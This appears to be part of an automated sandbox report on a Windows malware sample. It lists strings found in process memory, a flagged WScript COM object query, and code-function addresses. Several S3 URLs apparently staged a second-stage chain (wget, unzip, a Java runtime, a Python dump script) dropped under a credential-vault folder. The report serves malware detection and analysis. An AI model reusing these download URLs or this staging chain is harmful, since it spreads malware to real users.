Source: mshta.exe, 00000000.00000003.2199936338.000000000D8B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2202654128.000000000CFD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2183541360.000000000C98A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2182281973.000000000C98C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2203539288.000000000C13C000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 0000000B.00000000.2222201108.0000000000B9E000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://www.metalinker.org/typeoriginurn:ietf:params:xml:ns:metalinkdynamictagsidentityfilesfilenames
Source: javaw.exe, 00000010.00000002.3208367361.000000006D6F6000.00000002.00000001.01000000.00000010.sdmp, javaw.exe, 00000013.00000002.3224057643.000000006D6F6000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: http://www.oracle.com/hotspot/jvm/
Source: javaw.exe, 00000010.00000002.3208367361.000000006D6F6000.00000002.00000001.01000000.00000010.sdmp, javaw.exe, 00000013.00000002.3224057643.000000006D6F6000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: http://www.oracle.com/hotspot/jvm/java/monitor/address
Source: javaw.exe, 00000010.00000002.3208367361.000000006D6F6000.00000002.00000001.01000000.00000010.sdmp, javaw.exe, 00000013.00000002.3224057643.000000006D6F6000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: http://www.oracle.com/hotspot/jvm/vm/code_sweeper/id
Source: javaw.exe, 00000010.00000002.3208367361.000000006D6F6000.00000002.00000001.01000000.00000010.sdmp, javaw.exe, 00000013.00000002.3224057643.000000006D6F6000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: http://www.oracle.com/hotspot/jvm/vm/compiler/id
Source: javaw.exe, 00000010.00000002.3208367361.000000006D6F6000.00000002.00000001.01000000.00000010.sdmp, javaw.exe, 00000013.00000002.3224057643.000000006D6F6000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: http://www.oracle.com/hotspot/jvm/vm/gc/id
Source: javaw.exe, javaw.exe, 00000010.00000002.3208367361.000000006D6F6000.00000002.00000001.01000000.00000010.sdmp, javaw.exe, 00000013.00000002.3224057643.000000006D6F6000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: http://www.oracle.com/technetwork/java/javaseproducts/
Source: javaw.exe, 00000010.00000002.3208367361.000000006D6F6000.00000002.00000001.01000000.00000010.sdmp, javaw.exe, 00000013.00000002.3224057643.000000006D6F6000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: http://www.oracle.com/technetwork/java/javaseproducts/printRegionInfo(I)VgetHeapUsageForContext(I)Jg
Source: javaw.exe, 00000010.00000002.3197189783.0000000005000000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000010.00000002.3202598403.000000000A9E1000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.quovadis.bm
Source: javaw.exe, 00000010.00000002.3197189783.0000000005000000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.quovadis.bm#
Source: javaw.exe, 00000010.00000002.3197189783.0000000005336000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000010.00000002.3202598403.000000000A9BB000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000010.00000002.3197189783.0000000005000000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000010.00000002.3202598403.000000000A9E1000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.quovadis.bm0
Source: javaw.exe, 00000010.00000002.3202598403.000000000A91F000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.quovadisglobal.com/cps
Source: javaw.exe, 00000010.00000002.3197189783.0000000005336000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000010.00000002.3207249601.0000000016294000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000010.00000002.3202598403.000000000A9E1000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.quovadisglobal.com/cps0
Source: javaw.exe, 00000010.00000003.3164511187.0000000001314000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000013.00000002.3222106413.000000001573A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://branchlock.net
Source: unzip.exe	String found in binary or memory: https://branchlock.net/a/T/o/P/D/s/b/f/G/q/E/C/y/L/x/c/i/r/A/V/N/K/X/F/h/d/U/Z/Q/n/I/e/H/B/S/m/v/z/Y
Source: javaw.exe, 00000013.00000002.3222106413.000000001573A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://branchlock.netb
Source: javaw.exe, 00000010.00000002.3197189783.000000000514F000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://buskwet.s3.eu-west-1.amazonaws.com
Source: javaw.exe, 00000010.00000002.3197189783.000000000514F000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://buskwet.s3.eu-west-1.amazonaws.com/py3.12.zip
Source: wget.exe, 0000000B.00000002.3047917243.0000000000BD5000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: https://gnu.org/licenses/
Source: wget.exe, 0000000B.00000002.3047917243.0000000000BD5000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: https://gnu.org/licenses/gpl.html
Source: javaw.exe, 00000010.00000002.3197189783.0000000005000000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000010.00000002.3202598403.000000000A9E1000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://ocsp.quovadisoffshore.com
Source: javaw.exe, 00000010.00000002.3197189783.0000000005336000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000010.00000002.3202598403.000000000A9BB000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000010.00000002.3197189783.0000000005000000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000010.00000002.3202598403.000000000A9E1000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: javaw.exe, 00000010.00000002.3202598403.000000000A5F7000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://octupusgreat.s3.us-east-1.amazonaws.com/ffdump.py
Source: javaw.exe, 00000010.00000002.3202598403.000000000A91F000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://repository.luxtrust.lu
Source: javaw.exe, 00000010.00000002.3197189783.0000000005336000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000010.00000002.3202598403.000000000A9E1000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://repository.luxtrust.lu0
Source: mshta.exe, 00000000.00000003.2199936338.000000000D8B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2202654128.000000000CFD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2183541360.000000000C98A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2182281973.000000000C98C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2203539288.000000000C13C000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 0000000B.00000000.2222201108.0000000000B9E000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: https://savannah.gnu.org/bugs/?func=additem&group=wget.
Source: mshta.exe, 00000000.00000003.2202144379.00000000029C6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2217427897.00000000029C6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2246291371.00000000029C6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2247223645.0000000007812000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2201999349.000000000780F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2216712851.000000000780E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2217602385.000000000780F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2244452730.0000000007810000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://seasonmonster.s3.us-east-1.amazonaws.com/
Source: mshta.exe, 00000000.00000003.2217427897.00000000029C6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2246291371.00000000029C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://seasonmonster.s3.us-east-1.amazonaws.com/(
Source: mshta.exe, 00000000.00000002.2247223645.000000000781C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://seasonmonster.s3.us-east-1.amazonaws.com/jre-1.
Source: wget.exe, 0000000B.00000003.3047154819.0000000002FDA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://seasonmonster.s3.us-east-1.amazonaws.com/jre-1.8.zip
Source: wget.exe, 0000000B.00000002.3048295545.0000000000EC5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://seasonmonster.s3.us-east-1.amazonaws.com/jre-1.8.zip.s3
Source: wget.exe, 0000000B.00000002.3048295545.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://seasonmonster.s3.us-east-1.amazonaws.com/jre-1.8.zipFilesC)
Source: wget.exe, 0000000B.00000002.3048295545.0000000000EC5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://seasonmonster.s3.us-east-1.amazonaws.com/jre-1.8.zipN)
Source: wget.exe, 0000000B.00000002.3048295545.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://seasonmonster.s3.us-east-1.amazonaws.com/jre-1.8.zipORSC)
Source: mshta.exe, 00000000.00000003.2218374707.0000000002921000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2201999349.000000000780F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2226635939.0000000002924000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2246043177.0000000002925000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2226365916.00000000029B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2218125921.00000000029B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2222533499.0000000002923000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2246265636.00000000029B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://seasonmonster.s3.us-east-1.amazonaws.com/swiftcopy.pdf
Source: mshta.exe, 00000000.00000002.2246043177.0000000002925000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://seasonmonster.s3.us-east-1.amazonaws.com/swiftcopy.pdf$Z
Source: mshta.exe, 00000000.00000003.2218374707.0000000002921000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2226635939.0000000002924000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2222533499.0000000002923000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://seasonmonster.s3.us-east-1.amazonaws.com/swiftcopy.pdfGI
Source: mshta.exe, 00000000.00000003.2216529720.0000000007891000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2247270938.0000000007891000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://seasonmonster.s3.us-east-1.amazonaws.com/unzip.exe
Source: mshta.exe, 00000000.00000003.2216529720.0000000007891000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2247270938.0000000007891000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://seasonmonster.s3.us-east-1.amazonaws.com/unzip.exe6v
Source: mshta.exe, 00000000.00000003.2244452730.0000000007837000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2247270938.0000000007837000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2217602385.0000000007837000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2216712851.0000000007837000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://seasonmonster.s3.us-east-1.amazonaws.com/unzip.exeDt
Source: mshta.exe, 00000000.00000003.2201921377.0000000007891000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://seasonmonster.s3.us-east-1.amazonaws.com/wget.exe
Source: mshta.exe, 00000000.00000003.2201921377.0000000007891000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://seasonmonster.s3.us-east-1.amazonaws.com/wget.exe&v
Source: mshta.exe, 00000000.00000003.2201921377.0000000007891000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://seasonmonster.s3.us-east-1.amazonaws.com/wget.exeItM
Source: mshta.exe, 00000000.00000003.2216529720.0000000007891000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2247270938.0000000007891000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2201921377.0000000007891000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://seasonmonster.s3.us-east-1.amazonaws.com/wget.exeft
Source: mshta.exe, 00000000.00000003.2216712851.0000000007837000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://seasonmonster.s3.us-east-1.amazonaws.com:443/unzip.exe
Source: mshta.exe, 00000000.00000003.2202201319.0000000007853000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://seasonmonster.s3.us-east-1.amazonaws.com:443/wget.exe
Source: mshta.exe, 00000000.00000003.2202654128.000000000D524000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2216370998.00000000078C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2244222939.00000000078AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2182281973.000000000CED8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2216529720.0000000007891000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2198917590.00000000078BB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2201777178.000000000DB2A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2217974859.00000000078AB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2198882211.00000000078C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2201921377.0000000007891000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: javaw.exe, 00000010.00000002.3197189783.0000000005000000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000010.00000002.3202598403.000000000A9E1000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://wwww.certigna.fr/autorites/
Source: javaw.exe, 00000010.00000002.3197189783.0000000005336000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000010.00000002.3202598403.000000000A9BB000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000010.00000002.3197189783.0000000005000000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000010.00000002.3202598403.000000000A9E1000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://wwww.certigna.fr/autorites/0m
Source: javaw.exe, 00000010.00000002.3197189783.0000000005000000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://wwww.certigna.fr/autorites/k

System Summary

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\SysWOW64\wscript.exe	COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Windows\SysWOW64\wscript.exe	COM Object queried: Windows Script Host Network Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{093FF999-1EA0-4079-9525-9614C3504B74}

Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe

Code function: 15_2_004218E0: LoadLibraryA,GetProcAddress,strlen,realloc,GetVolumeInformationA,FreeLibrary,CreateFileA,DeviceIoControl,CloseHandle,_errno,_stricmp,strncpy,strncpy,strncpy,

15_2_004218E0

Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe	Code function: 15_2_0040C88E	15_2_0040C88E
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe	Code function: 15_2_004012CB	15_2_004012CB
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe	Code function: 15_2_00405B34	15_2_00405B34
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe	Code function: 15_2_00419BD0	15_2_00419BD0
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe	Code function: 15_2_0041FFD0	15_2_0041FFD0
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe	Code function: 15_2_004203F0	15_2_004203F0
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe	Code function: 15_2_00414D50	15_2_00414D50
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe	Code function: 15_2_004211D0	15_2_004211D0
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe	Code function: 15_2_00405590	15_2_00405590
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe	Code function: 15_2_004145B0	15_2_004145B0
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe	Code function: 15_2_00417E70	15_2_00417E70
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe	Code function: 15_2_00420EE0	15_2_00420EE0
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe	Code function: 15_2_0040DF40	15_2_0040DF40
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe	Code function: 15_2_00404F50	15_2_00404F50
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe	Code function: 15_2_0041CF00	15_2_0041CF00
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe	Code function: 15_2_00403FF0	15_2_00403FF0
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 16_2_00E15150	16_2_00E15150
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 16_2_00E13119	16_2_00E13119
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 16_2_00E08AC2	16_2_00E08AC2
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 16_2_00E0FA7C	16_2_00E0FA7C
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 16_2_00E27B11	16_2_00E27B11
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 16_2_00E06D13	16_2_00E06D13
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 16_2_00E08EFB	16_2_00E08EFB
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 16_2_00E22698	16_2_00E22698
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 16_2_00E087B8	16_2_00E087B8
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 16_2_00E07732	16_2_00E07732
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 16_2_00E0F73A	16_2_00E0F73A
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 16_2_6FA507A8	16_2_6FA507A8
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 16_2_6FA47FF7	16_2_6FA47FF7
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 16_2_6FA50FFC	16_2_6FA50FFC
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 16_2_6FA50F42	16_2_6FA50F42
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 16_2_6FA42F5A	16_2_6FA42F5A
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 16_2_6FA4AE9F	16_2_6FA4AE9F
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 16_2_6FA43593	16_2_6FA43593
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 16_2_6FA42C26	16_2_6FA42C26
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 16_2_6FA473BC	16_2_6FA473BC
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 16_2_6FA443C4	16_2_6FA443C4
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 16_2_6FA50324	16_2_6FA50324
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 16_2_6FA50A68	16_2_6FA50A68
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 16_2_6FA5112D	16_2_6FA5112D
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 16_2_6FA478E0	16_2_6FA478E0
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 16_2_6FA438F8	16_2_6FA438F8
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 16_2_6FA44031	16_2_6FA44031
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 16_2_6FA4B839	16_2_6FA4B839
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 16_2_6FB1B435	16_2_6FB1B435
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 16_2_6FAC8F37	16_2_6FAC8F37
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 16_2_6FAD8F72	16_2_6FAD8F72
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 16_2_6FA88DC3	16_2_6FA88DC3
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 16_2_6FB04DC9	16_2_6FB04DC9
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 16_2_6FAE8CEA	16_2_6FAE8CEA
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 16_2_6FAD4CDF	16_2_6FAD4CDF
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 16_2_6FB0AC17	16_2_6FB0AC17
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 16_2_6FAD0BAA	16_2_6FAD0BAA
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 16_2_6FAACAE5	16_2_6FAACAE5
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 16_2_6FB0EA62	16_2_6FB0EA62
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 16_2_6FAD8980	16_2_6FAD8980
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 16_2_6FAC499C	16_2_6FAC499C
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 16_2_6FACA9F1	16_2_6FACA9F1
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 16_2_6FB229C0	16_2_6FB229C0
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 16_2_6FB08972	16_2_6FB08972
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 16_2_6FAFC88E	16_2_6FAFC88E
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 16_2_6FB1E850	16_2_6FB1E850
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 16_2_6FAC674B	16_2_6FAC674B
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 16_2_6FAF8671	16_2_6FAF8671
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 16_2_6FB184BA	16_2_6FB184BA
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 16_2_6FB1E410	16_2_6FB1E410
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 16_2_6FAC0457	16_2_6FAC0457
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 16_2_6FA90108	16_2_6FA90108
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 16_2_6FB00102	16_2_6FB00102
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 16_2_6FB0417D	16_2_6FB0417D
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 16_2_6FB1E160	16_2_6FB1E160
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 16_2_6FABBF54	16_2_6FABBF54
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 16_2_6FAB5E8E	16_2_6FAB5E8E
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 16_2_6FA8DE5B	16_2_6FA8DE5B
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 16_2_6FA99A49	16_2_6FA99A49
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 16_2_6FAC999A	16_2_6FAC999A
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 16_2_6FAFB835	16_2_6FAFB835
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 16_2_6FABB835	16_2_6FABB835
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 16_2_6FB177E3	16_2_6FB177E3
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 16_2_6FAEF6C5	16_2_6FAEF6C5
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_6FB08C96	19_2_6FB08C96
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_6FAA8212	19_2_6FAA8212
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_6FA98E5D	19_2_6FA98E5D
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_6FAF8D29	19_2_6FAF8D29
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_6FA6ACC9	19_2_6FA6ACC9
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_6FAE6C33	19_2_6FAE6C33
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_6FAF4914	19_2_6FAF4914
